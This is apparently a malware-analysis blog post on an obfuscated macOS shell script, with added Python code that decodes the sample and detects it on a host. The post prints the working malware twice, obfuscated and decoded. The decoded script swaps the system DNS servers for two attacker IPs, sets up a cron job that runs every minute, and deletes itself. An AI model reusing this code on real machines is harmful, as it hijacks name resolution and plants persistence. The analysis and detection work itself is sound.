Analysis of an obfuscated script (MacOS)

Published on 2012-05-20 14:00:00.

We received a script via our submission mechanism. The script is obfuscated. The source code:

#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aae.zs;s2=cx.zxx.aaz.acs;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2 
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -i|tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
      klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
      ljnfxab ljnf.pfox
      jh -jr ljnf.pfox
rp
jh -jr "$0"

The first two lines of the file are the loader that decodes the rest of the script. Split on the semicolons, the one-liner reads:

x=`cat "$0" |wc -l|awk '{print $1}'`
x=`expr $x - 2`
tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1
s1=cx.zxx.aae.zs
s2=cx.zxx.aaz.acs
sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`
exit

The first three lines skip the first two lines of the file (the loader itself), decode the remainder with tr and write the result to a new file called 1.

rootbsd@malware.lu$ tail -23 216ce676b94128fef68858439dac1f6b6bf1f47d5b335c94547d04d6c750ffee | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2 
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -l|grep QuickTime.xpt`
if [ "$exist" == "" ]; then
        echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
        crontab cron.inst
        rm -rf cron.inst
fi
rm -rf "$0"

Two arguments, the decoded values of s1 and s2, are passed to the new script:

rootbsd@malware.lu$ echo cx.zxx.aae.zs |tr qazwsxedcr 0123456789
85.255.116.24
rootbsd@malware.lu$ echo cx.zxx.aaz.acs | tr qazwsxedcr 0123456789
85.255.112.184
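Running `tail | tr` on the sample, as above, executes nothing, but an analyst usually wants the same decoding in a form that also extracts the indicators in one pass. The following Python script is an added example, not part of the original post: it reproduces the loader's `tail -$x | tr FROM TO` step with a translation table, decodes the s1/s2 tokens with the digit alphabet, and summarises what the decoded script does. The embedded copy of the obfuscated sample is transcribed from the listing above; the function names and the summary keys are my own.

```python
import re

# Substitution alphabets copied from the sample's two tr invocations.
OBF_FROM = "vdehrujzpbqafwtgkxyilcnos"
OBF_TO = "upxmfqrzibdanwgkethlcyosv"
DIGIT_FROM = "qazwsxedcr"
DIGIT_TO = "0123456789"

# Transcription of the obfuscated sample (loader + 23 encoded lines).
SAMPLE = r'''#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aae.zs;s2=cx.zxx.aaz.acs;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -i|tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
      klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
      ljnfxab ljnf.pfox
      jh -jr ljnf.pfox
rp
jh -jr "$0"
'''


def deobfuscate(script: str) -> str:
    """Static equivalent of `tail -$x "$0" | tr FROM TO`: drop the two-line
    loader and push every remaining character through the tr table."""
    body = script.split("\n", 2)[2]
    return body.translate(str.maketrans(OBF_FROM, OBF_TO))


def decode_ip(token: str) -> str:
    """Static equivalent of `echo $sN | tr qazwsxedcr 0123456789`."""
    return token.translate(str.maketrans(DIGIT_FROM, DIGIT_TO))


def extract_loader_ips(script: str) -> list:
    """Find the sN=... assignments on the loader line and decode them."""
    loader = script.split("\n", 2)[1]
    return [decode_ip(v) for v in re.findall(r"\bs\d+=([a-z.]+)", loader)]


def summarize(script: str) -> dict:
    """Decode the sample and pull out the indicators worth recording."""
    decoded = deobfuscate(script)
    path = re.search(r'^path="([^"]+)"', decoded, re.M)
    dropped = re.search(r"\$path/([\w.]+)", decoded)
    return {
        "dns_servers": extract_loader_ips(script),
        "persistence": f"{path.group(1)}/{dropped.group(1)}" if path and dropped else None,
        "cron_every_minute": "* * * * *" in decoded,
        "changes_dns": "set State:/Network/Service/$PSID/DNS" in decoded,
        "self_deletes": 'rm -rf "$0"' in decoded,
    }


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(summarize(SAMPLE))
```

`str.maketrans` needs both alphabets to be the same length, exactly the constraint `tr` applies to its two arguments, so a sample whose alphabets differ in length is a sign that the extracted tr call is incomplete.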

These two IP addresses are located in Ukraine. The script sets them as the DNS servers on MacOS.
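On a host suspected of running this script, the two things to check are the active resolvers and the crontab entry the decoded script installs. The Python below is an added example, not part of the original post: it parses the `nameserver[N] : addr` lines that `scutil --dns` prints and a `crontab -l` listing, and reports resolvers matching the two decoded addresses plus any cron entry that executes something out of `/Library/Internet Plug-Ins`. Both input samples are constructed for the example.

```python
import re

# Decoded values from the analysis above.
KNOWN_BAD_DNS = {"85.255.116.24", "85.255.112.184"}
PLUGIN_DIR = "/Library/Internet Plug-Ins"

# Constructed excerpt of `scutil --dns` output on an affected host.
SCUTIL_DNS_SAMPLE = """DNS configuration

resolver #1
  nameserver[0] : 85.255.116.24
  nameserver[1] : 85.255.112.184
  if_index : 4 (en0)
"""

# Constructed `crontab -l` listing: one legitimate job plus the installed entry.
CRONTAB_SAMPLE = """# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1
"""


def dns_servers(scutil_text: str) -> list:
    """Collect every resolver address from `scutil --dns` output."""
    return re.findall(r"nameserver\[\d+\]\s*:\s*(\S+)", scutil_text)


def suspicious_cron_lines(crontab_text: str) -> list:
    """Return cron entries whose command lives in the browser plug-in directory,
    which no legitimate plug-in has a reason to do."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue
        if PLUGIN_DIR in fields[5]:
            hits.append(line)
    return hits


def assess(scutil_text: str, crontab_text: str) -> dict:
    """Combine both checks into one finding record."""
    return {
        "rogue_dns": sorted(s for s in dns_servers(scutil_text) if s in KNOWN_BAD_DNS),
        "cron_persistence": suspicious_cron_lines(crontab_text),
    }


if __name__ == "__main__":
    print(assess(SCUTIL_DNS_SAMPLE, CRONTAB_SAMPLE))
```

Because the script also wipes the dropped file name into `/dev/null` output and deletes itself, the crontab entry and the resolver change are the durable artefacts; removing the cron line alone leaves the DNS setting in place, so both should be reverted.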